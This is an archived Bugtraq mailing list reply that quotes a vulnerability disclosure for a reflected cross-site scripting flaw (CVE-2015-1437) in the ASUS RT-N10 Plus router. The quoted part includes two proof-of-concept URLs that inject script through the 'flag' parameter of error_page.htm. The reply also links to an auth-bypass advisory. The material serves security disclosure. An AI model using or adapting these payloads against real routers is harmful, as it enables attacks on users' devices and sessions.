Bugtraq mailing list archives
Re: CVE-2015-1437 XSS In ASUS Router.
From: Michael Meyer <micha () komma-nix de>
Date: Wed, 4 Feb 2015 14:44:49 +0100
*** kingkaustubh () me com wrote:
##################################### Title:- Reflected XSS vulnarbility in Asus RT-N10 Plus router Author: Kaustubh G. Padwad Product: ASUS Router RT-N10 Plus Firmware: 2.1.1.1.70 Severity: HIGH Auth: Not requierd CVE ID: CVE-2015-1437 # Description: Vulnerable Parameter: flag= # Vulnerability Class: Cross Site Scripting (https://www.owasp.org/index.php/Top_10_2013-A3-Cross-Site_Scripting_(XSS))
[...]
Enter this URL 1.http://router/error_page.htm?flag=initial78846%27%3balert(document.lastmodified)%2f%2f372137b5d 2.http://router/error_page.htm?flag=initial78846%27%3balert("Hacked_BY_S3curity_B3ast")%2f%2f372137b5d
https://sintonen.fi/advisories/asus-router-auth-bypass.txt Micha
Current thread:
- CVE-2015-1437 XSS In ASUS Router. kingkaustubh (Feb 03)
- Re: CVE-2015-1437 XSS In ASUS Router. Henri Salo (Feb 04)
- Re: CVE-2015-1437 XSS In ASUS Router. Michael Meyer (Feb 04)
- Re: CVE-2015-1437 XSS In ASUS Router. Darko Vršič (Feb 04)
- <Possible follow-ups>
- Re: Re: CVE-2015-1437 XSS In ASUS Router. kingkaustubh (Feb 04)